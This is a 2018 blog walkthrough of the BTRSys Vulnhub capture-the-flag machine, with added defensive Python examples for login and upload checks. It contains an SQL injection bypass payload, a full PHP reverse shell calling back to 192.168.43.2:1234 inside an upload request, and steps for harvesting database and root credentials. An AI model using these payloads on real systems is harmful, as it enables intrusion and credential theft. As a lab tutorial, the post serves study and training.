BTRSys - Vulnhub CTF Challenge Walkthrough

in bestvulnhubhackingchallenges •  6 years ago 


BTRSys is a Boot2Root challenge available at Vulnhub. It is a really interesting CTF, especially because its restrictions are enforced only on the client side, using JavaScript.

In this walkthrough, I'll be using Parrot Security OS but you can use any other Linux distro.

Start the machine and use Netdiscover to determine its IP. Then add that IP address to your local hosts file "/etc/hosts" so you don't have to remember it.

sudo netdiscover -r [IP/Subnet]
sudo nano /etc/hosts

 

Run a full port Nmap scan.

An HTTP server is running. Here is the index page.

There is no "robots.txt" file, so run a Nikto scan on the Server.

nikto -h http://btr.local/

 

Nikto has found a login page at "/login.php". Open your browser and go to the page.

We have no credentials to log in to this page, so let's look at the source code.

This script says that the username must contain "@btrisk.com" and that the password must not be a single quote. That is a hint about SQL injection, so let's try it. [a' or 1=1;#] worked as the password.


 

We are in.
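The login bypass above works because the form's checks live only in the browser and the server pastes the password into its SQL text. As an added example (not code from the challenge or the post), here is what that query looks like with the page's payload, beside a server-side check that repeats the "@btrisk.com" rule and uses a parameterized lookup; the users table, the account and its password are constructed for the demo.

```python
import hashlib
import hmac
import os
import sqlite3


def build_vulnerable_sql(username: str, password: str) -> str:
    """The pattern behind the page's bypass: input is glued into the SQL text.
    With the page's payload as the password the WHERE clause becomes a
    tautology and MySQL treats the trailing '#' as a comment."""
    return ("SELECT id FROM users WHERE username='" + username +
            "' AND password='" + password + "'")


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one account, salted and hashed password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                 "username TEXT UNIQUE, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO users (id, username, salt, pw_hash) VALUES (?, ?, ?, ?)",
                 (1, "admin@btrisk.com", salt, hash_password("s3cret", salt)))  # constructed
    return conn


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Server-side version of the rule the page's JavaScript only enforced in
    the browser, then a parameterized query so quotes in the input stay data.
    Returns the user id on success, None otherwise."""
    if not username.endswith("@btrisk.com"):
        return None
    row = conn.execute("SELECT id, salt, pw_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return None
    uid, salt, stored = row
    return uid if hmac.compare_digest(stored, hash_password(password, salt)) else None
```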


 

This page doesn't allow us to upload a PHP file, but the restriction is implemented in JavaScript. So we can intercept the request with Burp Suite and swap the file for the PHP reverse shell from Pentest Monkey.

Just open Burp Suite, set up the Burp proxy, and then try to upload the file.

POST /gonder.php HTTP/1.1
Host: 192.168.43.214
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.43.214/personel.php
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------1242813403962887366948510608
Content-Length: 2257

-----------------------------1242813403962887366948510608
Content-Disposition: form-data; name="dosya"; filename="php-reverse-shell.php"
Content-Type: image/png

<?php echo 'HidWQ5qP'; ?> <?php set_time_limit (0);$VERSION = "1.0";$ip = "192.168.43.2";$port = 1234;$chunk_size = 1400;$write_a = null;$error_a = null;$shell = "uname -a; w; id; /bin/sh -i";$daemon = 0;$debug = 0;if (function_exists("pcntl_fork")) { $pid = pcntl_fork();if ($pid == -1) { printit("ERROR: Cant fork");exit(1);} if ($pid) { exit(0);} if (posix_setsid() == -1) { printit("Error: Cant setsid()");exit(1);} $daemon = 1;} else {printit("WARNING: Failed to daemonise.This is quite common and not fatal.");}chdir("/");umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) { printit("$errstr ($errno)");exit(1);}$descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Cant spawn shell"); exit(1);}stream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {if (feof($sock)) {printit("ERROR: Shell connection terminated");break;} if (feof($pipes[1])) {printit("ERROR: Shell process terminated"); break;} $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);} if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input");fwrite($sock, $input);} if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input");fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);function printit ($string) { if (!$daemon) { print 
"$string\n";}}?> <?php echo 'Ot4Fw56d'; ?>

-----------------------------1242813403962887366948510608--
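The request above gets through because the server accepts whatever the browser-side script let past and trusts the client-supplied Content-Type (image/png on a .php file containing PHP). As an added example, not part of the challenge or the post, this is the kind of server-side validation that would have rejected it: decisions are made from the extension and the file's own bytes, and the stored name is never the client's. The sample uploads are constructed to mirror the request.

```python
import os
import secrets

# Magic bytes for the image types the upload form is meant to accept.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}


def validate_upload(filename: str, declared_type: str, content: bytes):
    """Return (ok, reason). The client-declared Content-Type is only a cheap
    first filter; the extension and the leading bytes decide."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED:
        return False, f"extension {ext!r} not allowed"
    if not declared_type.startswith("image/"):
        return False, "declared type is not an image"
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match the declared image type"
    # A valid image header followed by PHP is still a script to a misconfigured
    # server, so reject open tags anywhere in the body.
    if b"<?php" in content or b"<?=" in content:
        return False, "embedded PHP open tag"
    return True, "ok"


def safe_storage_name(filename: str) -> str:
    """Never reuse the client's name: random name plus the vetted extension."""
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext


# Constructed samples modelled on the page's Burp-modified request.
WEBSHELL_UPLOAD = ("php-reverse-shell.php", "image/png",
                   b"<?php echo 'HidWQ5qP'; ?> <?php set_time_limit(0); ?>")
PNG_UPLOAD = ("avatar.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
POLYGLOT_UPLOAD = ("avatar.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"<?php echo 1; ?>")
```

Serving the upload directory with script execution disabled is the second half of the fix; the validator alone should not be the only barrier.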


 

Now access the uploaded file at the URL "http://btr.local/uploads/php-reverse.shell.php" and you'll get a reverse shell on your Netcat listener.


 

Spawn a pty shell:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

 

We have a low-privilege shell but are not root yet. After some enumeration, you'll find a file "config" in "/var/www/html" that contains database passwords.


 

We got login credentials for the MySQL database. Now try to connect to MySQL:

mysql -uroot -p -Ddeneme

 

We got a password. Now try logging in.


 

The other users' passwords failed, but root's worked.


Posted from my blog with SteemPress : https://latesthackingnews.com/2018/09/23/btrsys-vulnhub-ctf-challenge-walkthrough/
